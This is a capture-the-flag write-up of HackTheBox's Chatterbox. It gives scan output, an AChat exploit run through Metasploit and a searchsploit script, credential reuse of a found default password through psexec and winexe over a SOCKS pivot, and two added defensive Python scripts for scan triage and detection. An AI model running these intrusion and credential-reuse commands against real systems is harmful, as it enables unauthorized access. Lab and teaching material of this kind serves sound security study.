Chatterbox From Hackthebox
Hello everyone, this is Hac. Today we will be doing Chatterbox from HackTheBox. It's a retired Windows box, so it should be fun solving it.
Nmap scan output:
└─$ sudo nmap -sC -sV -p- 10.129.108.170 --min-rate 10000 -oA nmap
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-26 02:33 EDT
Warning: 10.129.108.170 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.108.170
Host is up (0.076s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2010/tcp filtered search
5826/tcp filtered unknown
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
14496/tcp filtered unknown
17058/tcp filtered unknown
23978/tcp filtered unknown
28255/tcp filtered unknown
34469/tcp filtered unknown
39101/tcp filtered unknown
39782/tcp filtered unknown
45438/tcp filtered unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h20m00s, deviation: 2h18m34s, median: 5h00m00s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-10-26T11:35:12
|_ start_date: 2022-10-26T11:30:51
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-10-26T07:35:09-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.27 seconds
A heck ton of open ports, so let's start exploring from the most well-known one, 445. I tried to list SMB shares, but listing was disabled. Then I ran enum4linux hoping to find something, but no luck with that either. Two ports looked interesting, 9255 and 9256: a service called "achat" was running, and there was something HTTP-related as well. I tried to access port 9255 in a browser and got nothing (no response); accessing port 9256 returned a response saying "error".
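Before moving on, here is a small triage script, added to this writeup and not part of the original post, that parses nmap's normal output (the scan above, trimmed, is embedded as the sample) and turns it into defender-side findings: an exposed end-of-life OS, SMB signing not enforced, and a third-party chat service listening on 9255/9256. The finding texts, the regex and the function names are my own; nmap's line layout is the real one.

```python
import re

# Constructed sample: a trimmed copy of the nmap output shown above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2010/tcp filtered search
9255/tcp open http AChat chat system httpd
9256/tcp open achat AChat chat system
49152/tcp open msrpc Microsoft Windows RPC
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
"""

# One port-table row: "<port>/<proto> <state> <service> [<version...>]".
# \s+ tolerates both nmap's column padding and the single spaces left by copy/paste.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port-table row found in nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def triage(text):
    """Map the scan to the exposures a defender would want to fix first."""
    findings = []
    open_ports = {p["port"]: p for p in parse_ports(text) if p["state"] == "open"}
    lowered = text.lower()

    if 445 in open_ports:
        findings.append("SMB (445) reachable from the scanning network")
    # Host-script lines come from nmap's smb-security-mode / smb2-security-mode scripts.
    if "message_signing: disabled" in lowered:
        findings.append("SMB1 signing disabled: relay/tampering risk")
    if "signing enabled but not required" in lowered:
        findings.append("SMB2 signing not required: relay/tampering risk")
    if re.search(r"windows 7\b", lowered):
        findings.append("End-of-life OS (Windows 7) exposed")

    # Anything nmap attributes to AChat, by service name or version banner.
    achat = [p for p in open_ports.values()
             if "achat" in (p["service"] + " " + p["version"]).lower()]
    if achat:
        ports_str = ",".join(str(p["port"]) for p in sorted(achat, key=lambda p: p["port"]))
        findings.append(f"Third-party chat service AChat on {ports_str}: "
                        "check vendor advisories before exposing")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_NMAP):
        print("-", finding)
```

Feed it `nmap -oN` output (or the `.nmap` file written by `-oA`) and the same checks run unchanged; `-oG`/`-oX` output would need a different parser.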
I thought about running gobuster to look for a hidden directory, but it's always a good idea to look for public exploits for "achat" first.
Let's try to exploit the system with two different methods: with and without Metasploit.
First we will go with Metasploit. You may be wondering why? Cuz it's easy bro.
Well, I got an error: "[-] Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode." I was able to fix it by changing my payload: "set payload windows/meterpreter/reverse_tcp_allports" (see https://github.com/rapid7/metasploit-framework/issues/14130). You may need to run the exploit multiple times to get a shell.
Oh boi, the meterpreter shell was not at all stable; the shell kept dying.
So I tried the manual method, hoping to get a stable shell.
You can copy the exploit to your local machine with "searchsploit -m windows/remote/36025.py".
We need to modify the script a little bit. There is a really good GitHub repo that can help you with that; just follow the instructions given by the author of that repo: https://github.com/Juggernoobs/achat_reverse_tcp_exploit
Same problem continued: meterpreter kept dying :(
I was able to get a stable shell by migrating the process. You need to be very quick, cuz the shell………
Migrating from 1936 to 692
Got user.txt in "C:\Users\Alfred\Desktop".
Now I uploaded winPEASx86.exe to the box in order to enumerate the system.
Got a cleartext default password: "Welcome1!". I was wondering how I could use it. Maybe password reuse? But where could I use that password? Since we know there are only two users on this box, "alfred" and "administrator", I thought "maybe" administrator uses those creds to log in, but the question is where the heck I would use them. Maybe I can use psexec to get a shell, but for that we need to port forward.
Doing port forwarding with Metasploit:
1. Use this command in meterpreter: "run autoroute -s 127.0.0.1".
2. Now search for "auxiliary/server/socks_proxy".
3. Make sure to change the version to "4a".
4. Now you need to make some changes in "/etc/proxychains4.conf".
Now run a quick nmap scan to make sure your proxy is working.
Now let's try to list SMB shares: "proxychains smbclient -L 10.129.138.92 -U 'alfred%Welcome1!'" (smbclient takes the password after a % in the -U value; its -p option is the port).
Now let's try psexec to get a shell as administrator.
python3 ~/impacket/examples/psexec.py administrator:'Welcome1!'@10.129.138.92
Boooooomm, we got the shell. There are many non-Metasploit ways to do port forwarding, and maybe different ways to get root on this box, but the Metasploit way was much easier for me. In future articles I will try to do things the more manual way, for example using plink.exe for port forwarding.
Sadly we were not able to read the content of root.txt. Let's try a different method.
proxychains winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
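From the blue-team side, the last two steps leave a distinctive trace on the box: a network logon (Event ID 4624, logon type 3) whose source address is the host's own loopback, because the SMB traffic arrives through the tunnel rooted on the compromised machine, followed a moment later by a service install (Event ID 7045) whose binary was dropped into the ADMIN$ root, which is where psexec-style tools place their payload. The script below is an added example, not from the original post: the key=value event lines are constructed stand-ins for the real Windows event records, the service name, paths and timestamps are made up, and the two-minute correlation window is my own choice.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a simplified key=value form (not real EVTX/XML).
# Line 1: an ordinary remote logon. Lines 2-3: the pattern the writeup produces.
# Line 4: a benign service install that must not trigger.
SAMPLE_EVENTS = [
    r"ts=2022-10-26T12:02:10 id=4624 logon_type=3 account=alfred src=10.10.14.5",
    r"ts=2022-10-26T12:05:40 id=4624 logon_type=3 account=Administrator src=127.0.0.1",
    r"ts=2022-10-26T12:05:42 id=7045 service=XyZqAbCd path=C:\Windows\XyZqAbCd.exe start=demand",
    r"ts=2022-10-26T12:30:00 id=7045 service=svcdemo path=C:\Windows\System32\svchost.exe start=auto",
]

KV_RE = re.compile(r"(\w+)=(\S+)")
LOOPBACK = {"127.0.0.1", "::1"}
ADMIN_SHARE_ROOT = "c:\\windows\\"   # ADMIN$ maps to %SystemRoot%


def parse_event(line):
    ev = dict(KV_RE.findall(line))
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["id"] = int(ev["id"])
    return ev


def suspicious_logon(ev):
    """Type-3 (network) logon sourced from the host's own loopback address.

    Normal clients do not SMB-authenticate to themselves; a pivot through a
    SOCKS route that terminates on the box looks exactly like this.
    """
    return ev["id"] == 4624 and ev.get("logon_type") == "3" and ev.get("src") in LOOPBACK


def suspicious_service(ev):
    """7045 whose binary sits directly in the ADMIN$ root, not a subfolder."""
    if ev["id"] != 7045:
        return False
    path = ev.get("path", "").lower()
    return path.startswith(ADMIN_SHARE_ROOT) and "\\" not in path[len(ADMIN_SHARE_ROOT):]


def detect(lines, window=timedelta(minutes=2)):
    """Return alert strings; service installs are correlated with prior loopback logons."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    logons = [e for e in events if suspicious_logon(e)]
    alerts = []
    for ev in events:
        if not suspicious_service(ev):
            continue
        related = [l for l in logons if timedelta(0) <= ev["ts"] - l["ts"] <= window]
        if related:
            alerts.append(f"remote service exec: {ev['service']} installed {ev['path']} "
                          f"after loopback logon by {related[-1]['account']}")
        else:
            alerts.append(f"service binary in ADMIN$ root: {ev['service']} -> {ev['path']}")
    for l in logons:
        alerts.append(f"loopback network logon: {l['account']} at {l['ts'].isoformat()}")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("!", alert)
```

The service-path heuristic is deliberately narrow (binary directly under the ADMIN$ root) so that legitimate installers writing into System32 or Program Files do not fire; the loopback-logon check stands on its own and is the stronger of the two signals here, since the port forward in the writeup is what makes the logon appear to come from 127.0.0.1.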
I hope you like this writeup thanks for reading :)